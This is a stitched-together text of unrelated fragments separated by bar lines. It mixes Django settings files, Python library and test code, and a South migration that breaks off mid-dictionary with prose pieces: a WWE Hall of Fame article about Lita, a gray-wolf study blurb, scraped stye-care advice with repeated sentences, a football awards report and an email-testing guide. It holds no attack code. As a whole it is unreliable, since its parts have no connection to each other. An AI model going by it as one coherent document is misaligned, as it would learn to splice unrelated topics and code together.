# Set Root url
ROOT_URLCONF = 'goodnight_lead.urls'
# Set WSGI application path
WSGI_APPLICATION = 'goodnight_lead.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static asset configuration
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATICFILES_DIRS = (BASE_DIR / 'static',)
# We don't currently support uploading images from ckeditor, but we still
# need to define this variable
CKEDITOR_UPLOAD_PATH = 'ckeditor_uploads/'
# Default url for login page (override django default)
LOGIN_URL = '/login'
# Template configuration
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
|
Dumas will join a small and elite list of female grapplers such as the Fabulous Moolah, Mae Young, Sherri Martel and Wendi Richter into the heralded hall. Stratus, also a member (Class of 2013), has been chosen to induct her longtime rival and friend.
Dumas became an inspiration and idol for girls growing up watching her perform in the late 1990s into the new millennium. Among them was diva’s champion AJ Lee, who has cited Lita as a big reason she pursued a career in WWE. There is a video on YouTube of a teenage Lee getting emotional meeting Dumas for the first time. Today this lifelong fan is standing atop the WWE diva mountain, just like her idol did.
A lot has happened since Lita retired full-time from the ring.
Many of the women on the roster are being introduced to a new audience through the popular reality TV show “Total Divas” on E! Dumas, who came to WWE from experiences in Mexico, the independent scene and ECW, believes it’s almost bringing a different kind of attention.
Dumas’ career was filled with memorable moments from teaming with Matt and Jeff Hardy to working with Stratus. The two divas not only participated in a main event tag match involving Triple H and The Rock, but would headline their own Raw one-on-one almost a decade ago. She battled back from serious neck injuries and a torn ACL. Before retiring, Dumas was also an important part of Edge’s successful run with the WWE championship. Given all she has accomplished and sporadic appearances she has made for the company over the years, the verdict is out if we will see her compete again.
Dumas was Stratus’ last opponent as an active performer. Not long after, Mickie James was the final adversary for Lita at the 2006 Survivor Series. With that came the end of an era.
Since her time away from WWE, Dumas has been meeting fans at conventions, working on a few projects and enjoying her life. She recently appeared on CMT’s “Tattoo Titans” as a guest judge.
“That was actually the first thing I had done in a long time in the public eye,” Dumas said. “I was really reluctant. I had never watched the tattoo competition show or those reality shows. I did work in tattoo shops before I wrestled, so it was kind of fun to come back there. I ended up having a really good time with that crew. I’d like to do some more stuff with them. I talked to them about doing some more stuff. So you might be able to catch me on another ‘Tattoo Titans’ episode.
Dumas is excited for the upcoming WrestleMania Weekend in New Orleans. She anticipates the big showdown between The Undertaker and Brock Lesnar.
“It’s amazing that ‘Taker can still go out there and give not only a compelling show because you are still excited to see him, but there is still that hope or believability that somebody is going to break that streak,” Dumas said.
Dumas has gone from living in South Florida during her early years (until middle school) to living her dreams. She recalls happy times in Deerfield Beach and Boca Raton.
“I remember we’d walk down and sit there and talk about the ‘never did,’” Dumas said.
• Lita (Amy Dumas) joins the Ultimate Warrior, Mr. T, Carlos Colon, Paul Bearer, Razor Ramon and Jake The Snake Roberts in the 2014 Class of the WWE Hall of Fame from the Smoothie King Center in New Orleans. For the first time ever, the induction ceremony will air live in its entirety on the WWE Network at 9 p.m. EST Saturday, April 5.
• WrestleMania 30 will air 7 p.m. EST Sunday, April 6 from the Mercedes-Benz Superdome in New Orleans on pay-per-view and the WWE Network. Pre-show begins at 6 p.m. EST.
Visit www.WrestleMania.com for full card and details on everything surrounding the biggest spectacle in sports entertainment.
• Follow Lita on Twitter @AmyDumas.
• Follow me on Twitter @smFISHMAN for live tweets from New Orleans on WrestleMania Weekend.
|
from decimal import Decimal
from dimagi.ext.jsonobject import DictProperty, JsonObject, StringProperty
from corehq.apps.userreports.specs import TypeProperty
from corehq.apps.userreports.transforms.custom.date import get_month_display, days_elapsed_from_date
from corehq.apps.userreports.transforms.custom.numeric import \
get_short_decimal_display
from corehq.apps.userreports.transforms.custom.users import (
get_user_display,
get_owner_display,
get_user_without_domain_display,
)
class Transform(JsonObject):
    """
    Transforms provide an interface to take in an input value and output something else.
    Useful if you need to transform data before saving or displaying it in some way.
    """
    # Only 'custom' is accepted here; subclasses below replace this with
    # their own type tag via TypeProperty.
    type = StringProperty(required=True, choices=['custom'])
# Registry of the known custom transforms; CustomTransform.custom_type
# must be one of these keys, and maps to the callable applied to values.
_CUSTOM_TRANSFORM_MAP = {
    'month_display': get_month_display,
    'days_elapsed_from_date': days_elapsed_from_date,
    'user_display': get_user_display,
    'owner_display': get_owner_display,
    'user_without_domain_display': get_user_without_domain_display,
    'short_decimal_display': get_short_decimal_display,
}
class CustomTransform(JsonObject):
    """
    Custom transforms provide an interface to a limited set of known, custom operations
    to transform data. Examples of custom transforms include things like looking up a username
    or owner name from the ID.
    """
    type = TypeProperty('custom')
    # Must name an entry in _CUSTOM_TRANSFORM_MAP.
    custom_type = StringProperty(required=True, choices=_CUSTOM_TRANSFORM_MAP.keys())

    def get_transform_function(self):
        """Return the registered callable for this custom_type."""
        return _CUSTOM_TRANSFORM_MAP[self.custom_type]

    def transform(self, value):
        """Apply the configured custom transform to *value*."""
        return self.get_transform_function()(value)
class DateFormatTransform(Transform):
    """Transform that renders date values with a strftime format string."""

    type = TypeProperty('date_format')
    format = StringProperty(required=True)

    def get_transform_function(self):
        """Return a callable formatting values via self.format."""
        def _apply(value):
            # Anything without a working strftime() is passed through as-is.
            try:
                return value.strftime(self.format)
            except Exception:
                return value
        return _apply
class NumberFormatTransform(Transform):
    """Transform that renders numbers through a str.format template."""

    type = TypeProperty('number_format')
    format_string = StringProperty(required=True)

    def get_transform_function(self):
        """Return a callable formatting values via self.format_string."""
        def _apply(value):
            try:
                # String inputs are parsed as decimals first
                # (basestring: this module targets Python 2).
                number = Decimal(value) if isinstance(value, basestring) else value
                return self.format_string.format(number)
            except Exception:
                # On any failure, fall back to the original value.
                return value
        return _apply
class TranslationTransform(Transform):
    """Transform intended to translate display values (not yet active)."""

    type = TypeProperty('translation')
    translations = DictProperty()

    def get_transform_function(self):
        # For now the transform is the identity; translations are ignored.
        return lambda value: value
|
Current conservation policies might not be adequately protecting gray wolves (Canis lupus) in the Northern Rocky Mountains, according to recent research.
A team of researchers found that the wolves, which were reintroduced to the area in the mid-90s and later delisted from the Endangered Species Act in 2012, are now facing decreased survival and reproduction as well as smaller pack sizes.
As part of a study published in the journal Science, researchers examined the impact of hunting on wolf decline and distribution. The species went from having full protection under the Act to dealing with heavy human harvest, said Scott Creel, an ecology professor at Montana State University and lead author of the study.
|
"""
Django settings for CaptureRoyalTestServer project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y&nd31a-z5c9@rgp-p47wvettq@%38(p9g7%oq#*q=2-aa$m5f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'caproy',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'CaptureRoyalTestServer.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CaptureRoyalTestServer.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
|
A stye or sty (hordeolum) is a red bump, sort of like a pimple, that forms on the outside edge of the eyelid. Your eyelids have lots of small oil glands, especially around the eyelashes. Q. I'm constantly getting styes. How do I treat and prevent them? A. While uncomfortable, red, and painful, the good news is styes are usually harmless.
What May Trigger a Stye? Once you've had a stye or eye infection, it's important to replace your eye makeup, including your mascara and eye shadow, to prevent recurrence of an infection.... Any disease is easier to be prevented than to be cured. Stye is not an exception. Therefore, in order to prevent the disease and reduce the risk of recurrence, you should regularly improve the immunity, be physically active, avoid stress, hypothermia, and eat well.
How to stop a stye in its tracks. I think u should put a warm compress on it. I feel a stye coming on How can I prevent it. I am not sure you can prevent it, but to avoid having a really bad, painful one, use hot compresses. I also wash my eyelids with baby shampoo (the no-tears kind). Usually I warm up some water, dip cotton balls in and then hold them on my eyes until they get cold. I repeat... An eye stye (medical name is external hordeolum) is a painful red bump on the eyelid that becomes infected and causes a lot of irritation around the eye. The stye is caused by one or more oil glands in the eyelid becoming blocked which causes a buildup of bacteria. The end result is a swollen, and sometimes, painful bump on the eyelid filled up with pus.
10/11/2007 — Non-prescription products, however, cannot treat the infection associated with a sty, but can provide temporary relief of its symptoms, including burning, stinging and itching. Rarely, styes require lancing by a doctor.
McVey says there is no sure-fire way to prevent sties, but basic cleanliness is the top priority. Routine washing of hands and face is the best step for a lifetime of sty-free eyes. Routine washing of hands and face is the best step for a lifetime of sty-free eyes.
Your eye doctor can also address pain associated with styes. Sometimes, your eye doctor may choose to surgically open a large stye to relieve discomfort and prevent a serious infection. Sometimes, your eye doctor may choose to surgically open a large stye to relieve discomfort and prevent a serious infection.
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.core import util
from telemetry.core import exceptions
from telemetry.page import page as page_module
from telemetry.page.actions import page_action
class ClickElementAction(page_action.PageAction):
    """Page action that clicks a DOM element.

    The element is located either via the 'selector' attribute (a CSS
    selector) or via the 'text' attribute (visible element text); at
    least one of the two must be supplied.  Optional attributes:

      wait_for_navigate:    after clicking, wait for a navigation.
      wait_for_href_change: after clicking, wait (up to 60s) until
                            document.location.href changes.
    """

    def __init__(self, attributes=None):
        super(ClickElementAction, self).__init__(attributes)

    def RunAction(self, page, tab, previous_action):
        def DoClick():
            # Either 'selector' or 'text' is required to find the element.
            assert hasattr(self, 'selector') or hasattr(self, 'text')
            if hasattr(self, 'selector'):
                # Click the first element matching the CSS selector.
                code = 'document.querySelector(\'' + self.selector + '\').click();'
                try:
                    tab.ExecuteJavaScript(code)
                except exceptions.EvaluateException:
                    raise page_action.PageActionFailed(
                        'Cannot find element with selector ' + self.selector)
            else:
                # Locate the element by its text and click it via callback.
                callback_code = 'function(element) { element.click(); }'
                try:
                    util.FindElementAndPerformAction(tab, self.text, callback_code)
                except exceptions.EvaluateException:
                    raise page_action.PageActionFailed(
                        'Cannot find element with text ' + self.text)

        if hasattr(self, 'wait_for_navigate'):
            tab.PerformActionAndWaitForNavigate(DoClick)
        elif hasattr(self, 'wait_for_href_change'):
            old_url = tab.EvaluateJavaScript('document.location.href')
            DoClick()
            # Poll until the location changes (60-second timeout).
            util.WaitFor(lambda: tab.EvaluateJavaScript(
                'document.location.href') != old_url, 60)
        else:
            DoClick()

        page_module.Page.WaitForPageToLoad(self, tab, 60)
        tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
|
Ben Fidling claimed two titles as Horncastle Town held their end-of-season presentation night on Saturday.
Fidling got the nod from the dressing room and the sidelines as he collected the Players’ Player of the Year and Supporters’ Player of the Year accolades.
Richard Jackson got the nod from Andrew Shinn and Mickey Stones as he was named the Managers’ Player of the Year.
And 17-year-old Elliot Andrew also got his hands on a trophy after winning the Young Player of the Year award.
|
import json
from django.core.exceptions import ImproperlyConfigured
from ..compat import NoReverseMatch, render, render_to_string, reverse
def render_embed(nodes=None, request=None):
    """Render the djedi CMS embed template.

    With *nodes* given, render to a string with the nodes JSON-encoded
    into the page; otherwise render a response for *request* with an
    absolute CMS URL and no inline nodes.
    """
    if nodes is not None:
        context = {
            "cms_url": reverse("admin:djedi:cms"),
            "exclude_json_nodes": False,
            # Escape '</' so the JSON cannot terminate the <script> tag.
            "json_nodes": json.dumps(nodes).replace("</", "\\x3C/"),
        }
        return render_to_string("djedi/cms/embed.html", context)

    try:
        prefix = request.build_absolute_uri("/").rstrip("/")
        context = {
            "cms_url": prefix + reverse("admin:djedi:cms"),
            "exclude_json_nodes": True,
        }
        return render(request, "djedi/cms/embed.html", context)
    except NoReverseMatch:
        raise ImproperlyConfigured(
            "Could not find djedi in your url conf, "
            "enable django admin or include "
            "djedi.urls within the admin namespace."
        )
|
You’ve built an email and are ready to send it out to recipients? We strongly recommend that you send a test email to yourself to make sure that it looks exactly as you wanted both on mobile and desktop devices, with no rendering issues.
Prior to sending a test email, please use our checklist to make sure that your email is done according to the email standards.
The HTML email preview shows how your email will render on recipients devices.
To get back to your template, click either the “back to the editor” arrow or the “esc” button.
You cannot test the subject line and preheader text here.
Due to various devices dimensions, due to different rendering rules in numerous email clients, we cannot guarantee that your email will look exactly the same as shown in the preview mode.
To spread your built email among colleagues and clients for approval, you’ll need a shareable link.
Above your email, click the “Copy” button or the “open in new tab” button.
Having opened this link in a new window, you’ll get to see your subject line and the preheader about the template.
In fact, it’s very easy to send test email with Stripo.
Please, test all the links in your email. How? Click each of them and see where it takes you to.
Like we previously said, you cannot test your sender name with Stripo. Yet, you can test the subject line and the preheader.
If you’ve added interactive elements in your emails, you need to test HTML email on as many devices and in as many email clients as possible. Send test emails to your colleagues, friends, to everyone who won’t mind it, to see if interactivity works in the world’s top email clients.
Soon, we will integrate with Email on Acid. This tool shows how your email renders on like 80 devices and in like 20 email clients. Moreover, it will enable our users to check their emails for accessibility, for the links and even for the spam rate.
Like your final result? Then export your email to ESP you use.
Use our 300 prepared HTML email templates to reduce email production time by 60%.
|
# -*- coding: utf-8 -*-
# ###
# Copyright (c) 2016, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
import os
import io
import unittest
try:
    # Python 3: mock ships in the standard library.
    from unittest import mock
except ImportError:
    # Python 2: fall back to the external mock package.
    import mock

from lxml import etree

from .test_models import BaseModelTestCase

here = os.path.abspath(os.path.dirname(__file__))
# Directory holding the HTML fixture files used by these tests.
TEST_DATA_DIR = os.path.join(here, 'data')
class ReconstituteTestCase(unittest.TestCase):
maxDiff = None
def test_xhtml(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.xhtml')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
def test_html(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.html')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
def check_desserts(self, desserts):
"""Assertions for the desserts model"""
from ..models import model_to_tree
self.assertEqual('Desserts', desserts.metadata['title'])
self.assertEqual({
'shortId': None,
'id': '00000000-0000-0000-0000-000000000000@1.3',
'contents': [{
'shortId': 'frt',
'id': 'ec84e75d-9973-41f1-ab9d-1a3ebaef87e2@1.3',
'contents': [{
'shortId': None,
'id': 'apple@1.3',
'title': 'Apple'
},
{
'shortId': None,
'id': 'lemon@1.3',
'title': u'<span>1.1</span> <span>|</span> <span>レモン</span>'
},
{
'shortId': 'sfE7YYyV@1.3',
'id': 'b1f13b61-8c95-5fbe-9112-46400b6dc8de@1.3',
'contents': [{
'shortId': None,
'id': 'lemon@1.3',
'title': 'Lemon'
}
],
'title': '<span>Chapter</span> <span>2</span> <span>citrus</span>'
}
],
'title': 'Fruity'
},
{
'shortId': None,
'id': 'chocolate@1.3',
'title': u'チョコレート'
},
{
'shortId': None,
'id': 'extra@1.3',
'title': 'Extra Stuff'
}
],
'title': 'Desserts'}, model_to_tree(desserts))
base_metadata = {
u'publishers': [],
u'created': None, # '2016/03/04 17:05:20 -0500',
u'revised': None, # '2013/03/05 09:35:24 -0500',
u'authors': [
{u'type': u'cnx-id',
u'name': u'Good Food',
u'id': u'yum'}],
u'editors': [],
u'copyright_holders': [],
u'illustrators': [],
u'subjects': [u'Humanities'],
u'translators': [],
u'keywords': [u'Food', u'デザート', u'Pudding'],
u'title': u'チョコレート',
u'license_text': u'CC-By 4.0',
u'license_url': u'http://creativecommons.org/licenses/by/4.0/',
# 'version': 'draft',
u'language': 'en',
u'print_style': None,
u'cnx-archive-uri': None,
u'cnx-archive-shortid': None,
u'derived_from_title': None,
u'derived_from_uri': None,
u'version': None,
u'canonical_book_uuid': None,
u'slug': None,
}
fruity = desserts[0]
self.assertEqual('Binder', fruity.__class__.__name__)
self.assertEqual('Fruity', fruity.metadata['title'])
apple = fruity[0]
self.assertEqual('Document', apple.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Apple'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
metadata['canonical_book_uuid'] = 'ea4244ce-dd9c-4166-9c97-acae5faf0ba1'
apple_metadata = apple.metadata.copy()
summary = etree.fromstring(apple_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, apple_metadata)
lemon = fruity[1]
self.assertEqual('Document', lemon.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Lemon'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
lemon_metadata = lemon.metadata.copy()
summary = etree.fromstring(lemon_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, lemon_metadata)
citrus = fruity[2]
self.assertEqual('Binder', citrus.__class__.__name__)
self.assertEqual(citrus.metadata['title'], 'Citrus')
self.assertEqual(lemon.metadata, citrus[0].metadata)
chocolate = desserts[1]
self.assertEqual('Document', chocolate.__class__.__name__)
chocolate_metadata = chocolate.metadata.copy()
summary = etree.fromstring(chocolate_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = u'チョコレート'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
self.assertEqual(metadata, chocolate_metadata)
extra = desserts[2]
self.assertEqual('CompositeDocument', extra.__class__.__name__)
extra_metadata = extra.metadata.copy()
summary = etree.fromstring(extra_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = 'Extra Stuff'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
self.assertEqual(metadata, extra_metadata)
class CollateTestCase(BaseModelTestCase):
@property
def target(self):
from cnxepub.collation import collate
return collate
def test(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': 'Book One',
'license_url': 'http://my.license',
'cnx-archive-uri': 'bad183c3-8776-4a6d-bb02-3b11e0c26aaf'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><p>document one</p></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><p>document two</p></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset = io.BytesIO(b" ")
resource = self.make_resource('ruleset', ruleset, 'text/css',
filename='ruleset.css')
binder.resources.append(resource)
def mock_easybake(ruleset, in_html, out_html):
from lxml import etree
html = etree.parse(in_html)
# Add in a composite-page with title "Composite One" here.
body = html.getroot().xpath(
'//xhtml:body',
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
comp_elm = etree.SubElement(body, 'div')
comp_elm.attrib['data-type'] = 'composite-page'
comp_elm.append(etree.fromstring("""
<div data-type="metadata">
<h1 data-type="document-title" itemprop="name">Composite One</h1>
<div class="authors">
By:
Edited by:
Illustrated by:
Translated by:
</div>
<div class="publishers">
Published By:
</div>
<div class="permissions">
<p class="license">
Licensed:
<a href="" itemprop="dc:license,lrmi:useRightsURL" data-type="license"/>
</p>
</div>
<div class="description" itemprop="description" data-type="description"> </div>
</div>"""))
etree.SubElement(comp_elm, 'p').text = "composite document"
# Add the composite-page to the table-of-contents.
toc = html.getroot().xpath(
"//xhtml:*[@id='toc']/xhtml:ol",
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
etree.SubElement(toc, 'li').append(etree.fromstring('<a>Composite One</a>'))
out_html.write(etree.tostring(html))
with mock.patch('cnxepub.collation.easybake') as easybake:
easybake.side_effect = mock_easybake
fake_ruleset = 'div::after {contents: "test"}'
collated_binder = self.target(binder, fake_ruleset)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].id, 'a9428a6c-5d31-5425-8335-8a2e780651e0')
self.assertEqual(collated_binder[2].metadata['title'],
'Composite One')
def test_without_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
result = self.target(binder)
self.assertIs(binder, result)
def test_with_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><span>document one</span></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><span>document two</span></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset_bytes = b"""\
div[data-type='page'] > div[data-type='metadata'] {
copy-to: eob-all
}
div[data-type='page'] span {
copy-to: eob-all
}
body::after {
content: pending(eob-all);
class: end-of-book;
data-type: composite-page;
container: div;
}
/* copied from cte books/rulesets/common/toc.less */
body > div[data-type="page"],
body > div[data-type="composite-page"]:pass(20) {
string-set: page-id attr(id);
}
body > div[data-type="page"] > div[data-type="metadata"] > \
h1[data-type='document-title'],
body > div[data-type="composite-page"] > div[data-type="metadata"] > \
h1[data-type='document-title']:pass(20) {
copy-to: page-title;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-title);
attr-href: "#" string(page-id);
container: a;
move-to: page-link;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-link);
move-to: eob-toc;
container: li;
}
nav#toc:pass(30) {
content: '';
}
nav#toc:pass(30)::after {
content: pending(eob-toc);
container: ol;
}
"""
resource = self.make_resource('ruleset',
io.BytesIO(ruleset_bytes),
'text/css',
filename='ruleset.css')
binder.resources.append(resource)
collated_binder = self.target(binder, ruleset_bytes)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].metadata['title'],
'Document One')
|
"A Pile of Prints," the film that gave this site its name, has been revised and renamed, "Color?"
a pile of my prints? Click the photo below and then the "play" arrow to see my answer.
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'SplitClient'
db.delete_table(u'notes_splitclient')
# Adding model 'SplitTrans'
db.create_table(u'notes_splittrans', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal(u'notes', ['SplitTrans'])
# Deleting field 'ParfumSizes.size_oz'
db.delete_column(u'notes_parfumsizes', 'size_oz')
# Adding field 'ParfumSizes.size_ml'
db.add_column(u'notes_parfumsizes', 'size_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'Split.min_ml'
db.delete_column(u'notes_split', 'min_ml')
# Deleting field 'Split.pp_ml'
db.delete_column(u'notes_split', 'pp_ml')
# Adding field 'Split.bottle_price'
db.add_column(u'notes_split', 'bottle_price',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, related_name='decanted', to=orm['notes.ParfumSizes']),
keep_default=False)
# Adding field 'Split.splits'
db.add_column(u'notes_split', 'splits',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.split_size'
db.add_column(u'notes_split', 'split_size',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
def backwards(self, orm):
# Adding model 'SplitClient'
db.create_table(u'notes_splitclient', (
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
))
db.send_create_signal(u'notes', ['SplitClient'])
# Deleting model 'SplitTrans'
db.delete_table(u'notes_splittrans')
# Adding field 'ParfumSizes.size_oz'
db.add_column(u'notes_parfumsizes', 'size_oz',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'ParfumSizes.size_ml'
db.delete_column(u'notes_parfumsizes', 'size_ml')
# Adding field 'Split.min_ml'
db.add_column(u'notes_split', 'min_ml',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.pp_ml'
db.add_column(u'notes_split', 'pp_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
# Deleting field 'Split.bottle_price'
db.delete_column(u'notes_split', 'bottle_price_id')
# Deleting field 'Split.splits'
db.delete_column(u'notes_split', 'splits')
# Deleting field 'Split.split_size'
db.delete_column(u'notes_split', 'split_size')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
